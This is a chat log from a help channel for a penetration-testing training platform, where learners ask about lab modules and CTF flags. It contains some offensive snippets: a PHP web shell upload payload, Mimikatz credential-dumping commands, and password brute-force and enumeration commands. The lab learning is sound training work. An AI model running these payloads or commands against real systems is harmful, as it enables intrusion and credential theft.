Hi guys, anyone is able to finish the Rogue Actions module - Attacking AI apps and system

#

I am stuck on thus

#

This*

#

Cannot find the flag, hints ?

unkempt ore
jolly oasis
#

I had a quick question on SQLMap Essentials > Attack Tuning > Prefix/Suffix.
In the questions section we get hint that helps us figure out the prefix. In the event we don't have a hint like that, how could we figure out what prefix or suffix to use? Is there something in the SQLMap output that would help us?

tawdry goblet
#

Hi

lapis delta
#

hey guys! not sure if that's just me or if it's an actual error in the course but earlier today i was doing the "Pentest in a Nutshell"'s module "Linux Initial Access" section. And when running the exactly same command for the wpscan i have received no info about the wp theme and plugins, then when i was trying to exploit it (again copypasting metasploit commands from the section) the exploit didn't work (seemingly as if the host wasn't vulnerable which would make sense since the wpscan didn't find anything).

am i supposed to play with the wpscan's parameters and find some other vuln?

teal arrow
#

Module: Windows Privilege Escalation
Lesson: Skills Assessment Part 1

Question:Find the password for the ldapadmin account somewhere on the system.

I found the KB's but I need a little nudge to help me figure out the second question. Don't really know what to do here.

bitter hazel
#

need help in a ctf

#

can anyone ??

cloud urchin
bitter hazel
#

no but first time in the server , need help urgently

cloud urchin
bitter hazel
#

its a local ctf and i need help , any1?

sturdy aurora
#

this guy has been asking for help in the xCTF server btw, and also replied with vulgarity when i said “try harder”

cloud urchin
bitter hazel
#

its not that deep bro

static shadow
glass portal
#

hello, best diccionaries for hscking wifi?

grizzled schooner
#

Anyone having VPN issues - USA?

#

Keep getting Initialization sequence completed making it really hard to do anything

#

Haven't done it, but you could always try to kerberoast with nxc

cloud urchin
#

@dry falcon Please do not reveal content from modules above tier 0, especially attack paths in skill assessments

dry falcon
#

AD Enumeration & Attacks - Skills Assessment Part II

task 4 : Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

  1. i use ldap nxc ldap 172.16.17.3 -u 'temp' -p 'temp' --users gives usernames , but how to get working username from or all work ??
  2. while brutefource password crackmapexec smb 172.16.17.3 -u ldap_users.txt -p pass.txt it take so so many time as these many username and password it will take years to finish.
  3. any short good wordlist to use ?
    but username are still so many take years.
grizzled schooner
#

Downloaded new VPN file and restarted laptop - VPN still isn't working... Just times out when trying to RDP into machine, then appears to restart(?) my VPN? Please @ with responses

static shadow
frosty acorn
#

Hey guys I try to sub with student monthly

#

I add my email of my university but I can’t purchase

teal arrow
sterile sonnet
#

I'm working on "Windows Event Logs & Finding Evil," and I'm unsure how to attempt a hijack using calc.exe.

thorny skiff
#

guys I'm totally new any advices🗿?

compact patrolBOT
dim needle
#

hello everyone, I just stuck at the Abusing HTTP Misconfigurations module at Skills Assessment - Easy part can aynone give any hint please

rich salmon
#

Hi guys i'm doing wi-fi evil twin attacks using wifiphisher and can't get a reverse shell for the 2nd question. I've done the attack like 10 times and reset the machine and the target 2 times but still nothing!

reef axle
#

guys I'm stuck at super easy section but I dunno where i go wrong, Web Fuzzing -> Validating Output, so I've to fuzz the target system to find hidden directory and access tar.gz file, i fuzz using this command.

FFUF -w directory-list-2.3-medium.txt -u http://IP:PORT/FUZZ, now the problem is i get alot of errors of fuzz that ffuf displays and i dont get any directory.

#

errors like this
: Progress: [119006/220560] :: Job [1/1] :: 1492 req/sec :: Duration: [0:01:21] ::Errors: 11896::
Progress: [119197/220560] :: Job [1/1] :: 1526 req/sec :: Duration: [0:01:22] :: Errors: 11915 <snip>

#

tons of errors

bright tundra
#

I have a question, im working on the information gathering section for the bug bounty job path, and for the skills assessment, I am trying to brute force, directories, and on the target, but it is getting a lot of errors related to no NXDOMAIN. Could anyone DM me and help?

cloud urchin
reef axle
#

yes yes😂

cloud urchin
#

that's your problem then

reef axle
#

well i got it by changing the spawn target

reef axle
cloud urchin
#

yeah you do use the IP:Port from the target, but you have to replace IP:PORT in your command

#

oh ok

reef axle
#

just changing the spawn target worked well

fickle tendon
#

I'm doing the pentester job path, but I'm having trouble on some devices with getting ps1 scripts to run. Even after I load them and try to change the execution policy, it will accept my command but not show any results. I vaguely remember something covering this in a module. Is anybody able to point me in the right direction?

fickle tendon
steep sigil
#

I have been running into a consistent problem transferring files from my kali attack host to module lab machines. Every time I try to transfer either to a Windows machine over SMB or any other method, the lab machine crashes or in the case of all Linux lab machines, it stalls forever as pictured, then the lab crashes after about 5 minutes or less.

What I have tried:

  • only using TCP vpn
  • resetting my kali machine
  • resetting the vpn
  • updating ovpn file as instructed
  • changing servers (all have the same problem so far as I can tell)
  • checking if OVPN is up to date
  • testing on multiple lab machines
  • tested MTU

This looks to me like an issue for support since I've seen others who are having the same issues and tried what I have. Currently I'm trying to study for the CPTS exam and this is hampering my ability to learn. I have paid for an annual subscription so I expect this issue to get resolved as soon as possible. Thanks for the attention to this matter.

steep sigil
#

Solved: Updating OpenVPN and setting MTU to 1350 got it working.

quiet halo
#

im doing domain enumuration and came across this sentence "Next, we can identify the hosts directly accessible from the Internet and not hosted by third-party providers. This is because we are not allowed to test the hosts without the permission of third-party providers."

#

what's the diff between hosts directly accessible from the Internet vs hosted by third-party providers?

radiant crystal
#

I am experiencing some pain on the skills assessment of the Network Foundations module...

I've followed the steps exactly, and yet when I try to connect to FTP on the target machine I get Connection refused.

The instructions to find the dynamic port for FTP are to multiply p1 by 256 and add p2. For me that looks like: Passive Mode (10,129,41,16,194,11).

So, 194*256+11 = 49675... that should be my dynamic port to establish the connection. And yet nc -v <target ip> 49675 yields me the error 49675 (?) : Connection refused, and thus I cannot continue the lab. Any help would be greatly appreciated!

EDIT: Got it to work by restarting the environment. No lessons learned, not sure why that behavior was happening...

cedar yew
#

hi all i need help

Module : ADCS
Section: Certifried (CVE-2022-26923)
Question : Administrator flag

My problem: ’m working through the Certifried scenario and I’m at the following point: I created a new machine account (addcomputer.py) and requested a certificate for it using the Machine template (certipy req). The certificate contains the NT hash of DC02$, and I set up a Kerberos cache (ccache) using KRB5CCNAME to try authenticating. However, when I attempt to connect using wmiexec.py or secretsdump.py -k, I keep getting errors. Am I performing the Kerberos authentication step correctly, or is there something missing?

little shadow
#

Hi, I'm doing the 'Stack-Based Buffer Overflows on Windows x86' module from the 'Intro to Binary Exploitation' path, and I'm struggling to understand the 'Identifying Bad Characters' section.

The course states:

The output we seek is where all bytes from both locations are the same, with no differences whatsoever. However, we see that after the first character, 00, all remaining bytes are different. 
This indicates that 0x00 truncated the remaining input, and hence it should be considered a bad character.

Is this referring to the difference between the ByteArray_1.bin file and the output of the ERC --compare <ESP VALUE> C:\Users\htb-student\Desktop\ByteArray_1.bin command in DBG? Please correct me if I'm wrong.
Also, can a program have several different bad characters?

feral lotus
#

I have the exact same problem can anyone help me with this?

normal dagger
#

Can someone help me on dacl attacks 2 -logon scripts the second question says get Benjamins flag but Julio only has read property to script-path : for Benjamin :////

clever zenith
#

hello can i ask for some help with a file upload module

#

like i've successfully uploaded a file but i can't like execute commands Content-Disposition: form-data; name="uploadFile"; filename="images.png.phar"
Content-Type: image/png

GIF8
<?php system($_GET["cmd"]; ?> i

#

i've used that but when i browse to the payload to execute any command it says ( challenge_ip is currently unable to handle this request.
HTTP ERROR 500 )

static shadow
#

is it normal to have GET request in the skill assessment section from FILE UPLOAD attacks module ? . Im trying to upload file but its not a POST request

tight kraken
# little shadow Hi, I'm doing the 'Stack-Based Buffer Overflows on Windows x86' module from the ...

Sounds like you've got the concept! Just to restate it:
The output of ERC --compare... is a line-by-line comparison of the clean ByteArray ("From Array") to what was actually written into memory at ESP ("From Memory Region"). Memory will match the clean byte array up until the point where a bad character messed it up.

We'll often encounter multiple bad characters while working on a single buffer overflow. Some of these bad characters arise from the nature of the program itself-- for example 0x00, a string termination character in assembly, C/C++, etc. Other characters can be "bad" as a consequence of the way the exploit is delivered, e.g. 0x0D is a return (\r) character in an HTTP POST request.

The process of finding bad characters is an iterative one. At the first point where ESP differs from the clean byte array, we can't trust the alignment of anything that comes after. We remove the bad character that started the chain reaction, loop through the process with a new byte array, another comparison, rinse and repeat until there are no differences between memory and the clean byte array (as shown in the debugger output).

That said, there's a short list of characters which are frequent offenders (like those mentioned above, plus more highlighted in the module). We can save a lot of time by just excluding these from the start, assuming they're likely to be bad. Then we can manually eliminate the more exotic characters if needed.

storm elk
static shadow
clever zenith
#

it's the type filters

static shadow
#

ahh , i solved it last night

clever zenith
#

i mean i've successfully uploaded the file

#

but i can't execute any commands getting a 500 request error from the browser

static shadow
#

if the file is uploaded try to find a way you can execute the payload

#

the webshell

clever zenith
fiery berry
clever zenith
#

omgggg

#

thank you man

#

i'm blind

static shadow
toxic mango
#

Hiiiii

#

Im backkkk

#

After about 8 months or a little less

#

💀

ancient crag
#

https://academy.hackthebox.com/module/147/section/1638
Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?
C:\tools\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Can't find user david. But I can find user julio.
Am I doing anything wrong or could this be a failure in the machine?

rotund scarab
#

Hey all, i need some assistance
Im on the footprinting module, DNS section and its asking for a flag after doing zone transfer, i did it, but anything i enter as a flag in the format needed is incorrect. Am i looking in the wrong place or missing something?

clever zenith
#

which section ?

static shadow
clever zenith
#

Actually its a post on the upload.php i guess

static shadow
clever zenith
#

On the upload.php you getting get?

static shadow
#

Let me check once again

clever zenith
#

I dont remmember chaning any of the methods

eager spindle
#

I encountered a problem about section 'RDP and SOCKS Tunneling with SocksOverRDP' in the module Pivoting Tunneling and Port Forwarding

#

Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
Hint
Jason is a local account and a Defender may try to stand in your way.

#

My problem is in the last step

eager spindle
hollow ermine
#

Someone can help me with MSSQL, Exchange, and SCCM Attacks - Skill Assessment QUEST 4? I have a problem that i cant reach the SCCM db in 172.16.20.50

hollow ermine
#

Nevermind, i solved

azure turtle
#

im on this question What is the username of the third user (id=3)? from Information Disclosure (with a twist of SQLi). I'm 99% i have the right answer i even got the answer to the second question on that same section which is strange. I'm not sure if something is broken or if i am really just wrong

Edit: something was just glitched out it just wasn't showing up for some reason

fiery trench
#

Anyone available to give a nudge on Advanced SQL Injections Skills Assessment Q1?

I'm able to find the endpoint that contains the SQLi and I have a base point on a boolean response bypassing the validation, however, as I try to come up with another true or false test poking at the database itself they all comeback as false.

brisk olive
#

hi

bright epoch
#

Hello, obiora

cosmic sentinel
cosmic sentinel
sacred rock
#

Have you taken a look at the website's source code?

cosmic sentinel
hollow kernel
#

Is a double pivot

wind gust
#

for Unconstrained Delegation - Users . Im trying to RDP with the creds provided but its not workinng. Anyone knows why ?

gray yacht
eager spindle
hollow kernel
ember dew
#

What channel should I go to if I am having an issue solving a challenge. I seem to be doing everything correctly. I checked the write-up to be sure and it still isn't working.

gray yacht
lapis delta
sacred rock
minor hinge
#

Web Attacks IDOR Challenge machines have a bad response time can someone check if that is true also for you?

obsidian canopy
#

From where i can learn bug bounty any resources

compact patrolBOT
mellow rapids
#

Hi everyone! Can someone help out with a question?

#

I am in the Password Attack Module and have been doing good pretty farm but cannot retrieve the flag after login in ftpuser

#

any pointers?

cosmic sentinel
wary plover
#

<@&861185840277487616> pfp

full smelt
#

Where can i learn hacking and how much could it take me

compact patrolBOT
wary plover
#

Yeah wrong server buddy

novel matrix
#

Lets stay on topic mate

fathom pendant
#

That's not what this server is about

lapis delta
sacred rock